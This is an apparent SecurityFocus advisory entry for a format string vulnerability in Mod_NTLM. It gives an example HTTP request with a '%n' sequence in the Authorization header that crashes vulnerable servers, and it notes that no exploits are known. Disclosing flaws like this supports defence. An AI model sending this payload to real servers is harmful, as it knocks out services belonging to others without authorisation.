Mod_NTLM Authorization Format String Vulnerability

The following example will trigger a denial of service against a vulnerable server:

GET / HTTP/1.0
Authorization: %n%n%n%n

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


 

Privacy Statement
Copyright 2010, SecurityFocus